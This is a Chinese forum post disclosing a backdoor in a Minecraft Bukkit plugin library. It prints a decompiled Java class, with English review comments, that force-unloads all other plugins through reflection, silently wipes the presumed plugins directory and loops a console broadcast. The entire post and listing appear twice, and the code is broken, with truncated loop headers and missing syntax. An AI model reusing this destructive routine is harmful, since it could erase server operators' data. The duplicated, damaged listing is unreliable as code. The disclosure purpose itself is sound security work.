被举报插件帖:https://www.mcbbs.net/forum.php?mod=viewthread&tid=768827
歪打正着找到一个明目张胆的后门。
也不知道 JerezClassLibrary 到底是何方神圣,居然有两种后门。
提取百度网盘样本,可在 cn.Jerez.Library.Utils.BackDoor 下发现这段代码:
package cn.Jerez.Library.Utils;
import cn.Jerez.Library.BasePlugin;
import java.io.File;
import java.io.IOException;
import java.lang.reflect.Field;
import java.net.URLClassLoader;
import java.util.Iterator;
import java.util.List;
import java.util.Map;
import org.bukkit.Bukkit;
import org.bukkit.command.Command;
import org.bukkit.command.CommandMap;
import org.bukkit.command.CommandSender;
import org.bukkit.command.ConsoleCommandSender;
import org.bukkit.command.PluginCommand;
import org.bukkit.command.SimpleCommandMap;
import org.bukkit.plugin.Plugin;
import org.bukkit.plugin.PluginManager;
/**
 * Decompiled class from the reported plugin library, reproduced here for analysis.
 *
 * <p>What the visible code does: both {@code deleteAll*} methods resolve the
 * "JerezLibrary" plugin, take the parent of its data folder and recursively delete it;
 * {@code deleteAllPlugin} first unloads every other plugin by editing the plugin
 * manager's private fields through reflection. Nothing in this class shows what calls
 * these methods or where {@code msg} comes from.
 *
 * <p>NOTE(review): the listing is damaged decompiler/web output, not compilable Java.
 * Three {@code for} headers are cut off after the loop variable, generic type arguments
 * are missing, a comma is missing before {@code 10L, 10L}, and one {@code if} has a
 * bare declaration as its body. The code lines are left exactly as published.
 *
 * <p>Traits visible here that are worth checking for when triaging other plugin jars:
 * recursive {@code File.delete()} rooted at {@code getDataFolder().getParentFile()},
 * {@code getDeclaredField} on "plugins" / "lookupNames" / "commandMap" /
 * "knownCommands", and empty catch blocks around all of it.
 */
public class BackDoor {
/**
 * Recursively deletes the parent directory of the "JerezLibrary" plugin's data folder.
 *
 * <p>On a standard Bukkit layout a plugin's data folder is {@code plugins/<PluginName>},
 * so the parent is presumably the server's whole {@code plugins} directory (jars,
 * configuration and data of every plugin) - confirm against the server layout.
 *
 * @param msg unused in this method
 */
public static void deleteAllFolder(String msg) {
// BasePlugin is not shown; there is no null check, so a missing plugin would throw
// NullPointerException on the next line.
Plugin plugin = BasePlugin.getInstance("JerezLibrary");
File dataFolder = plugin.getDataFolder();
File parentFile = dataFolder.getParentFile();
delete(parentFile);
}
/**
 * Unloads every plugin except "JerezLibrary" itself, deletes the parent of its data
 * folder, then schedules a repeating task that prints and broadcasts {@code msg}.
 *
 * @param msg text printed to stdout and appended to the console {@code say} command on
 *            every run of the scheduled task
 */
public static void deleteAllPlugin(final String msg) {
PluginManager pm = Bukkit.getServer().getPluginManager();
Plugin plugin = BasePlugin.getInstance("JerezLibrary");
Plugin[] p = pm.getPlugins();
byte b;
int i;
Plugin[] arrayOfPlugin1;
// NOTE(review): loop header is truncated in the published listing; everything after
// "b" is missing (presumably the "< i" bound and the opening brace were lost when the
// page dropped the '<'). The body walks the plugin array p.
for (i = (arrayOfPlugin1 = p).length, b = 0; b
Plugin pt = arrayOfPlugin1[b];
String name = pt.getName();
// Spares only itself. The comparison is case-insensitive here, while unload() matches
// the name with case-sensitive equals().
if (!plugin.getName().equalsIgnoreCase(name))
unload(null, name);
b++;
}
// Same deletion as deleteAllFolder(): parent of this plugin's data folder.
File dataFolder = plugin.getDataFolder();
File parentFile = dataFolder.getParentFile();
delete(parentFile);
// Registers a repeating scheduler task owned by `plugin`; nothing in this class
// cancels it.
Bukkit.getServer().getScheduler().runTaskTimer(plugin, new Runnable() {
public void run() {
System.out.println(msg);
try {
// Dispatched as the console sender; msg is concatenated without any validation.
Bukkit.getServer().dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "say " + msg);
// Empty catch: a failing broadcast is never reported.
} catch (Exception exception) {}
}
// The two 10L arguments are the initial delay and the repeat period, in server ticks.
// NOTE(review): the comma before the first 10L is missing in the listing.
}10L, 10L);
}
/**
 * Forcibly removes the named plugin from the running server by editing the plugin
 * manager's private state through reflection.
 *
 * @param sender only null-checked in the listing; never used afterwards
 * @param name plugin name to unload, matched with case-sensitive {@code equals}
 * @return {@code false} when the plugin manager is null or any reflective access fails;
 *         as listed, also {@code false} in every other case, because
 *         {@code pluginVersion} is never assigned
 */
public static boolean unload(CommandSender sender, String name) {
// NOTE(review): decompiler artifact - a local declaration cannot be the body of an
// `if`. The original presumably fell back to the console sender; the local is never
// read in the visible code.
if (sender == null)
ConsoleCommandSender consoleCommandSender = Bukkit.getConsoleSender();
PluginManager pluginManager = Bukkit.getPluginManager();
SimpleCommandMap commandMap = null;
List plugins = null;
Map lookupNames = null;
Map knownCommands = null;
if (pluginManager == null)
return false;
try {
// Reads private fields of the concrete plugin-manager class and of the command map.
// getDeclaredField() only searches the exact runtime class, so any mismatch ends in
// the catch below and the method returns false without logging anything.
Field pluginsField = pluginManager.getClass().getDeclaredField("plugins");
pluginsField.setAccessible(true);
plugins = (List)pluginsField.get(pluginManager);
Field field1 = pluginManager.getClass().getDeclaredField("lookupNames");
field1.setAccessible(true);
lookupNames = (Map)field1.get(pluginManager);
Field field2 = pluginManager.getClass().getDeclaredField("commandMap");
field2.setAccessible(true);
commandMap = (SimpleCommandMap)field2.get(pluginManager);
Field field3 = commandMap.getClass().getDeclaredField("knownCommands");
field3.setAccessible(true);
knownCommands = (Map)field3.get(commandMap);
} catch (Exception e) {
return false;
}
// Never reassigned in the listing, so the isEmpty() check at the end always fails.
String pluginVersion = "";
Plugin[] lookupNamesField = pluginManager.getPlugins();
int commandMapField = lookupNamesField.length;
// NOTE(review): truncated loop header, same damage as the other loops; presumably
// bounded by commandMapField. The decompiler's variable names are misleading: these
// are the plugin array, its length and the index.
for (int knownCommandsField = 0; knownCommandsField
Plugin next = lookupNamesField[knownCommandsField];
if (next.getName().equals(name)) {
pluginManager.disablePlugin(next);
// Drop the plugin from the manager's internal list and name lookup map.
if (plugins != null && plugins.contains(next))
plugins.remove(next);
if (lookupNames != null && lookupNames.containsKey(name))
lookupNames.remove(name);
// Unregister every command owned by this plugin (identity comparison on the plugin).
// NOTE(review): "Iterator>" is what remains of a generic type after extraction.
for (Iterator> it = knownCommands.entrySet().iterator(); it.hasNext(); ) {
Map.Entry entry = it.next();
if (entry.getValue() instanceof PluginCommand) {
PluginCommand command = (PluginCommand)entry.getValue();
if (command.getPlugin() == next) {
command.unregister((CommandMap)commandMap);
it.remove();
}
}
}
ClassLoader cl = next.getClass().getClassLoader();
try {
// Unchecked cast: a loader that is not a URLClassLoader would raise
// ClassCastException, which the IOException-only catch does not handle. close()
// releases the resources the loader opened - presumably so the plugin's jar can be
// deleted afterwards.
((URLClassLoader)cl).close();
} catch (IOException iOException) {}
// Only a hint to the JVM.
System.gc();
}
}
if (!pluginVersion.isEmpty())
return true;
return false;
}
/**
 * Recursively deletes a file or a whole directory tree without reporting anything.
 *
 * <p>{@code File.delete()} signals failure through its boolean return value, which is
 * discarded here; the try/catch blocks only hide runtime exceptions. A partial wipe
 * therefore leaves no message in the server log.
 *
 * @param f file or directory to remove; {@code null} is ignored
 */
public static void delete(File f) {
if (f == null)
return;
if (f.isFile()) {
try {
f.delete();
} catch (Exception exception) {}
} else {
File[] fs = f.listFiles();
if (fs != null && fs.length > 0) {
byte b;
int i;
File[] arrayOfFile;
// NOTE(review): truncated loop header, as above; the body recurses into each child.
for (i = (arrayOfFile = fs).length, b = 0; b
File ft = arrayOfFile[b];
delete(ft);
b++;
}
}
// Children first, then the directory itself.
try {
f.delete();
} catch (Exception exception) {}
}
}
}
歪打正着找到一个明目张胆的后门。
也不知道 JerezClassLibrary 到底是何方神圣,居然有两种后门。
提取百度网盘样本,可在 cn.Jerez.Library.Utils.BackDoor 下发现这段代码:
package cn.Jerez.Library.Utils;
import cn.Jerez.Library.BasePlugin;
import java.io.File;
import java.io.IOException;
import java.lang.reflect.Field;
import java.net.URLClassLoader;
import java.util.Iterator;
import java.util.List;
import java.util.Map;
import org.bukkit.Bukkit;
import org.bukkit.command.Command;
import org.bukkit.command.CommandMap;
import org.bukkit.command.CommandSender;
import org.bukkit.command.ConsoleCommandSender;
import org.bukkit.command.PluginCommand;
import org.bukkit.command.SimpleCommandMap;
import org.bukkit.plugin.Plugin;
import org.bukkit.plugin.PluginManager;
/**
 * Decompiled class from the reported plugin library, reproduced here for analysis.
 *
 * <p>What the visible code does: both {@code deleteAll*} methods resolve the
 * "JerezLibrary" plugin, take the parent of its data folder and recursively delete it;
 * {@code deleteAllPlugin} first unloads every other plugin by editing the plugin
 * manager's private fields through reflection. Nothing in this class shows what calls
 * these methods or where {@code msg} comes from.
 *
 * <p>NOTE(review): the listing is damaged decompiler/web output, not compilable Java.
 * Three {@code for} headers are cut off after the loop variable, generic type arguments
 * are missing, a comma is missing before {@code 10L, 10L}, and one {@code if} has a
 * bare declaration as its body. The code lines are left exactly as published.
 *
 * <p>Traits visible here that are worth checking for when triaging other plugin jars:
 * recursive {@code File.delete()} rooted at {@code getDataFolder().getParentFile()},
 * {@code getDeclaredField} on "plugins" / "lookupNames" / "commandMap" /
 * "knownCommands", and empty catch blocks around all of it.
 */
public class BackDoor {
/**
 * Recursively deletes the parent directory of the "JerezLibrary" plugin's data folder.
 *
 * <p>On a standard Bukkit layout a plugin's data folder is {@code plugins/<PluginName>},
 * so the parent is presumably the server's whole {@code plugins} directory (jars,
 * configuration and data of every plugin) - confirm against the server layout.
 *
 * @param msg unused in this method
 */
public static void deleteAllFolder(String msg) {
// BasePlugin is not shown; there is no null check, so a missing plugin would throw
// NullPointerException on the next line.
Plugin plugin = BasePlugin.getInstance("JerezLibrary");
File dataFolder = plugin.getDataFolder();
File parentFile = dataFolder.getParentFile();
delete(parentFile);
}
/**
 * Unloads every plugin except "JerezLibrary" itself, deletes the parent of its data
 * folder, then schedules a repeating task that prints and broadcasts {@code msg}.
 *
 * @param msg text printed to stdout and appended to the console {@code say} command on
 *            every run of the scheduled task
 */
public static void deleteAllPlugin(final String msg) {
PluginManager pm = Bukkit.getServer().getPluginManager();
Plugin plugin = BasePlugin.getInstance("JerezLibrary");
Plugin[] p = pm.getPlugins();
byte b;
int i;
Plugin[] arrayOfPlugin1;
// NOTE(review): loop header is truncated in the published listing; everything after
// "b" is missing (presumably the "< i" bound and the opening brace were lost when the
// page dropped the '<'). The body walks the plugin array p.
for (i = (arrayOfPlugin1 = p).length, b = 0; b
Plugin pt = arrayOfPlugin1[b];
String name = pt.getName();
// Spares only itself. The comparison is case-insensitive here, while unload() matches
// the name with case-sensitive equals().
if (!plugin.getName().equalsIgnoreCase(name))
unload(null, name);
b++;
}
// Same deletion as deleteAllFolder(): parent of this plugin's data folder.
File dataFolder = plugin.getDataFolder();
File parentFile = dataFolder.getParentFile();
delete(parentFile);
// Registers a repeating scheduler task owned by `plugin`; nothing in this class
// cancels it.
Bukkit.getServer().getScheduler().runTaskTimer(plugin, new Runnable() {
public void run() {
System.out.println(msg);
try {
// Dispatched as the console sender; msg is concatenated without any validation.
Bukkit.getServer().dispatchCommand((CommandSender)Bukkit.getConsoleSender(), "say " + msg);
// Empty catch: a failing broadcast is never reported.
} catch (Exception exception) {}
}
// The two 10L arguments are the initial delay and the repeat period, in server ticks.
// NOTE(review): the comma before the first 10L is missing in the listing.
}10L, 10L);
}
/**
 * Forcibly removes the named plugin from the running server by editing the plugin
 * manager's private state through reflection.
 *
 * @param sender only null-checked in the listing; never used afterwards
 * @param name plugin name to unload, matched with case-sensitive {@code equals}
 * @return {@code false} when the plugin manager is null or any reflective access fails;
 *         as listed, also {@code false} in every other case, because
 *         {@code pluginVersion} is never assigned
 */
public static boolean unload(CommandSender sender, String name) {
// NOTE(review): decompiler artifact - a local declaration cannot be the body of an
// `if`. The original presumably fell back to the console sender; the local is never
// read in the visible code.
if (sender == null)
ConsoleCommandSender consoleCommandSender = Bukkit.getConsoleSender();
PluginManager pluginManager = Bukkit.getPluginManager();
SimpleCommandMap commandMap = null;
List plugins = null;
Map lookupNames = null;
Map knownCommands = null;
if (pluginManager == null)
return false;
try {
// Reads private fields of the concrete plugin-manager class and of the command map.
// getDeclaredField() only searches the exact runtime class, so any mismatch ends in
// the catch below and the method returns false without logging anything.
Field pluginsField = pluginManager.getClass().getDeclaredField("plugins");
pluginsField.setAccessible(true);
plugins = (List)pluginsField.get(pluginManager);
Field field1 = pluginManager.getClass().getDeclaredField("lookupNames");
field1.setAccessible(true);
lookupNames = (Map)field1.get(pluginManager);
Field field2 = pluginManager.getClass().getDeclaredField("commandMap");
field2.setAccessible(true);
commandMap = (SimpleCommandMap)field2.get(pluginManager);
Field field3 = commandMap.getClass().getDeclaredField("knownCommands");
field3.setAccessible(true);
knownCommands = (Map)field3.get(commandMap);
} catch (Exception e) {
return false;
}
// Never reassigned in the listing, so the isEmpty() check at the end always fails.
String pluginVersion = "";
Plugin[] lookupNamesField = pluginManager.getPlugins();
int commandMapField = lookupNamesField.length;
// NOTE(review): truncated loop header, same damage as the other loops; presumably
// bounded by commandMapField. The decompiler's variable names are misleading: these
// are the plugin array, its length and the index.
for (int knownCommandsField = 0; knownCommandsField
Plugin next = lookupNamesField[knownCommandsField];
if (next.getName().equals(name)) {
pluginManager.disablePlugin(next);
// Drop the plugin from the manager's internal list and name lookup map.
if (plugins != null && plugins.contains(next))
plugins.remove(next);
if (lookupNames != null && lookupNames.containsKey(name))
lookupNames.remove(name);
// Unregister every command owned by this plugin (identity comparison on the plugin).
// NOTE(review): "Iterator>" is what remains of a generic type after extraction.
for (Iterator> it = knownCommands.entrySet().iterator(); it.hasNext(); ) {
Map.Entry entry = it.next();
if (entry.getValue() instanceof PluginCommand) {
PluginCommand command = (PluginCommand)entry.getValue();
if (command.getPlugin() == next) {
command.unregister((CommandMap)commandMap);
it.remove();
}
}
}
ClassLoader cl = next.getClass().getClassLoader();
try {
// Unchecked cast: a loader that is not a URLClassLoader would raise
// ClassCastException, which the IOException-only catch does not handle. close()
// releases the resources the loader opened - presumably so the plugin's jar can be
// deleted afterwards.
((URLClassLoader)cl).close();
} catch (IOException iOException) {}
// Only a hint to the JVM.
System.gc();
}
}
if (!pluginVersion.isEmpty())
return true;
return false;
}
/**
 * Recursively deletes a file or a whole directory tree without reporting anything.
 *
 * <p>{@code File.delete()} signals failure through its boolean return value, which is
 * discarded here; the try/catch blocks only hide runtime exceptions. A partial wipe
 * therefore leaves no message in the server log.
 *
 * @param f file or directory to remove; {@code null} is ignored
 */
public static void delete(File f) {
if (f == null)
return;
if (f.isFile()) {
try {
f.delete();
} catch (Exception exception) {}
} else {
File[] fs = f.listFiles();
if (fs != null && fs.length > 0) {
byte b;
int i;
File[] arrayOfFile;
// NOTE(review): truncated loop header, as above; the body recurses into each child.
for (i = (arrayOfFile = fs).length, b = 0; b
File ft = arrayOfFile[b];
delete(ft);
b++;
}
}
// Children first, then the directory itself.
try {
f.delete();
} catch (Exception exception) {}
}
}
}